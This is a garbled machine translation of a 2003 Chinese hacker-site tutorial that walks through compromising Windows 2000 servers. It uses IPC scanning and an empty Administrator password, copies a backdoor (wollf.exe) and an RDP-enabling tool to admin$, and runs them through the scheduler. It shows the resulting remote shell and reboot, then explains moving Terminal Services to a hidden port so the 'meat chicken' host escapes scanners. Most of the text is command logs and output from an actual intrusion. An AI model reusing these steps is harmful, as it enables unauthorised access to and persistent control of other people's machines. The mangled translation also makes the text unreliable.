To opens 3389 from ip to serve |http://www.cshu.net to 3,389 for you




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analysis>> to opens 3389 from ip 
                  to serve to 3,389 for you  Printing

            To opens 3389 from ip to serve to 3,389 for you
            Www.cshu.net  2003-3-1  fog rain village 

              How to opens 3389 from ip to serve to finally 3,389 for you! 
              Tool: Time 4.7 (http://www.heibai.net/download/show.php? 
              Id=2277&down=1) 
              Wollf v1.6 (http://www.heibai.net/download/show.php? 
              Id=2996&down=1) 
              HBULOT (http://www.heibai.net/download/show.php? Id=2951&down=1) 
              This machine platform: 2000/NT 
              Goal platform: 2000/NT 
              Above the tool in black and white can find, the concrete 
              application method can be able to introduce in the article. 
              First opens the time (if your time all has not listened, I thought 
              your necessity had not looked this article), Ctrl+A, fills in 
              section of ip, chooses IPC to sweep 
              Traces. One could have the result: 
              218.22.155. * (SERVER) 
              -------------------------------------------------------------------------------- 

              IPC scanning 
              Obtains sharing to tabulate 
              G f e h I 
              Obtains the user to tabulate 
              02,912 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER 
              TsInternetUser 
              Guesses solution success user account Administrator (Admin): 
              (NULL) 
              Casually looked for to do the experiment, first ip on continually 
              again said. 
              ========================================================================================== 

              C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155. 
              *\ip "" /us 
              Er:administrator---------------- connects successfully! 
              Orders successfully to complete. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe 
              \\218.22.155. *\admi 
              N$------------------------------ copy wollf.exe to target computer 
              admin$ table of contents 
              Has duplicated 1 document. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe 
              \\218.22.155. *\adm 
              In$----------------------------- copy hbulot.exe to target 
              computer admin$ table of contents 
              Has duplicated 1 document. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155. 
              * 
              The \\218.22.155. * current time is 200.2/12/1 million morning 
              06:37 
              Orders successfully to complete. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155. * 
              06:39 wollf.exe 
              Newly added a work, its work ID = 1-- assigns wollf.exe in 06:39 
              movement 
              ------------------------------------------------------------------------------------------ 

              Explained: 
              Wollf.exe is a back door procedure, very many masters all like nc 
              or winshell, but I have only one in mind to him! Only introduces 
              and in this article in here me 
              Accommodates the related order parameter, its high-level usage 
              does not make the supplement. 
              Hbulot.exe is uses in to open 3,389 services, if is not server and 
              above edition, did not have to move. Because the pro version 
              cannot install the terminal service. 
              After 2 minutes...... 
              ========================================================================================== 

              C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 
              218.22.155. * 7,614 
              "Wollf Remote Manager" v1.6 
              Code by wollf, http://www.xfocus.org 
              ------------------------------------------------------------------------------------------ 

              Explained: 
              Uses when the wollf connection must pay attention to wollf.exe to 
              have in the current directory, its connection forms of field 
              orders: Wollf -connect IP 7,614 
              7,614 is the port which wollf opens. If demonstrated like on, 
              explained you already connected successfully, and had the manager 
              administrator jurisdiction. 
              ========================================================================================== 

              [ server@D:\WINNT\system32 ] #dos 
              Microsoft Windows 2,000 [ Version 5.00.2195 ] 
              (C) all rights reserved 1985-2000 Microsoft Corp. 
              ------------------------------------------------------------------------------------------ 

              Explained: 
              Inputs dos, you can enter under goal machine cmd, by now similarly 
              had the administrator jurisdiction. 
              ========================================================================================== 

              D:\WINNT\system32>cd.. 
              Cd.. 
              D:\WINNT>dir h*. * 
              Dir h*. * 
              In the driver D volume does not have the label. 
              The volume sequence number is 1Ce5-2615 
              D:\WINNT table of contents 
              2002-11-27 03:07 <DIR> Help 
              2002-09-10 12:16 10,,752 hh.exe 
              2002-10-01 08:29 24,,576 HBULOT.exe 
              2 documents 35,,328 bytes 
              1 table of contents 9,049,604,096 may use the byte 
              D:\WINNT>hbulot 
              Hbulot 
              ------------------------------------------------------------------------------------------ 

              Explained: 
              Because we put HBULOT.exe to goal machine admin$ under, therefore 
              first found it, above is the document depositing position. 
              ========================================================================================== 

              D:\WINNT>exit 
              Exit 
              Command "DOS" succeed. 
              [ server@D:\WINNT\system32 ] #reboot 

              Command "REBOOT" succeed. 
              [ server@D:\WINNT\system32 ] # 
              Connection closed. 
              ------------------------------------------------------------------------------------------ 

              Explained: 
              Draws back from dos to under the wollf connection pattern orders 
              with exit, after the HBULOT.exe movement must restart only then 
              becomes effective, here wollf brings REBOOT 
              The order, carries out you has been able to lose the connection 
              after 5 seconds. After the start finished inspects next 3,389 
              ports whether opens, the method are very many, superscan3 sweeps 
              . This time you were allowed to land. If has not opened 3,389 that 
              is not server and above edition, did not have to move. Because the 
              pro version cannot install 
              Terminal service. 
              To here, you already had 3,389 meats chickens! But can discover by 
              other intruder? Under teaches how is lets 3,389 serve for you! 
              We now use 3,389 landing have two kind of editions, one kind is 
              2.000/98 million, one kind is XP. Two difference? Former use 
              tacitly approves port 3389 to be right 
              The goal, latter tacitly approves also is 3,389 ports, but it also 
              supports other port to carry on the connection! Therefore..... We 
              revise 3,389 connections ports 
              Has hidden the ordinary scanner scanning! Revision method as 
              follows: 
              The revision server end port establishment, the registration table 
              has 2 places to need to revise. 
              [ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 
              Server\Wds\rdpwd\Tds\tcp ] 
              The PortNumber value, tacitly approves is 3389, revises port which 
              hoped, for instance 1,314 
              Second place: 
              [ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 
              Server\WinStations\RDP-Tcp ] 
              The PortNumber value, tacitly approves is 3389, revises port which 
              hoped, for instance 1,314 
              Now like this was allowed. Again opens the system. 
              Attention: In fact, only revises second also is may. Moreover, the 
              second standard joint should be 
              [ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 
              Server\WinStations\<connection> 
              <connection> expressed concrete some Rdp-tcp links. 
              After again has opened, has a look the port to have changes. 
              Small skill: When revision registration table key value, first 
              chooses 10 to enter the system, inputs port value which you hoped, 
              then chooses 16 to enter the system, the system can automatically 
              transform


              Original author: -> cat <- love 
              Origin: Heibai.net 
              Altogether has 407 readers to read this article 

              [Tells friend] 
            Previous article:Microsoft public source code! Signs the government 
            source code to set up a file the agreement 

            Next article:Simple 3,389 invasions processes 

            - this week popular article - related article 
            To opens 3389 from ip to serve to 3,389 for you



      CSHU 
